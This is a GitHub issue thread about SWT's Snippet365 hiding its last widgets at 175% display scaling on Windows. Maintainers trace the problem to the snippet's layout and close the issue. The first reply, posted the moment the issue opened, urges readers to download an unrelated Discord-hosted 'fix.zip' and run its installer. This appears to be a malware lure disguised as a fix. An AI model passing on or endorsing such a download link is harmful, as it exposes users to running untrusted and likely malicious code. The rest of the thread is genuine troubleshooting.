### ISSUE TITLE
When scaled from 125% to 175%, the last set of widgets are missing.

### ISSUE THREAD

**Issue by deepika-u** [eclipse-platform/eclipse.platform.swt#1442] opened 2024-09-03 13:15 UTC
**Describe the bug**
When i run the Snippet365, the last set of widgets(Table, tree, expand bar) are seen missing at 175% resolution. Attaching the screenshots here.

At 125% resolution i see all the 3 widgets displayed(Table, tree, expand bar section).
![image](https://github.com/user-attachments/assets/2e9db2e5-dc96-48c2-a8e0-ff3de209f00b)

But at 175% resolution, i dont see the last set of widgets(Table, tree, expand bar section).
![image](https://github.com/user-attachments/assets/f9530424-be9a-4ddc-9885-a62bb5bbdc0d)

with respect to tables, i tried Snippet349 => this works fine.
wrt tree, i tried Snippet312 => this works fine.
wrt expand bar, i tried Snippet223 => this works fine.

**Expected behavior**
If not full widget, since there is no scroll bar so some part of the set of widgets atleast should be visible. Or else when scrolled, it should show full set of 3 widgets section.

**Environment:**
1. Select the platform(s) on which the behavior is seen:
- - [ ] All OS
- - [X] Windows
- - [ ] Linux
- - [ ] macOS 

2. Additional OS info (e.g. OS version, Linux Desktop, etc)
Eclipse SDK
Version: 2024-09 (4.33)
Build id: I20240903-0240
OS: Windows 11, v.10.0, x86_64 / win32
Java vendor: Oracle Corporation
Java runtime version: 21.0.1+12-29
Java version: 21.0.1
 
**Version since**
Didnt try on older versions.

**Workaround (or) Additional context**
Any known workarounds for the problem?
Not aware of.

**Comment by Dominic54321** [comment] 2024-09-03 13:15
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by akoch-yatta** [comment] 2024-09-03 13:53
@deepika-u what resolution does the monitor have? The bottom widget is probably wrapped to the right outside of your visible scope, because it doesn't fit. But I have this effect (on any zoom) only when I resize the shell manually.

**Comment by HeikoKlare** [comment] 2024-09-03 14:17
I cannot reproduce this problem. This is how it looks on a 175% monitor for me:
![image](https://github.com/user-attachments/assets/74e05523-b751-45ae-bc88-f22a80c8c10a)

Exact two-monitor setup:
1. Left monitor: 100%, secondary
2. Rightmonitor: 175%, primary

Result for 200% is the same.

Eclipse SDK
Version: 2024-09 (4.33)
Build id: I20240903-0240
SWT version: current from R4_33_maintenance branch
Windows 11 10.0.2200
Eclipse Temurin JDK 17.0.8.101

**Comment by deepika-u** [comment] 2024-09-04 05:56
@akoch-yatta 
I have only my laptop with Windows 11 and dont have a secondary monitor.
When i am at 175% i am seeing as below
![image](https://github.com/user-attachments/assets/5d252eb8-345a-47d1-af37-be33e6c2c4de)

This window is in maximum size(full screen). May be since there is no scrollbar i am not able to see the bottom set of widgets via this snippet output.

But when i tried with 150% resolution of my display i am seeing everything fine as below 
![image](https://github.com/user-attachments/assets/632dc419-1c8e-4585-a387-40a2221006f7)

@HeikoKlare : Thanks for confirming. Anyways since you are able to see all the widgets at 175% resolution of your display and other widgets(via the other snippets) are anyways working. => **i feel we can close this issue if everyone agrees to it?**

**Comment by HeikoKlare** [comment] 2024-09-04 07:24
Thank you for the additional information! Then the comment of @akoch-yatta applies:

> what resolution does the monitor have? The bottom widget is probably wrapped to the right outside of your visible scope, because it doesn't fit. But I have this effect (on any zoom) only when I resize the shell manually (and then it is expected).

You have resized the shell (via maximizing it) to a smaller size than what is necessary to display all the widgets. You can emulate that by just reducing the size (height) when being on, e.g., a 150% monitor. Once the height is less than what is required to show all widgets, the bottom ones will be placed right next to the other widgets. You will usually not see them there as well, as the shell is horizontally too small either.

This is existing behavior due to the way the snippet is implemented/layouted. Starting the snippet from R4_31_maintenance branch shows the same results.

Thus, I am closing this according to your proposa. There does not seem to be any regression or other issue (except for the possibility to enhance the snippet layout).

**Closed by HeikoKlare** 2024-09-04 07:24 UTC
Labels: Windows
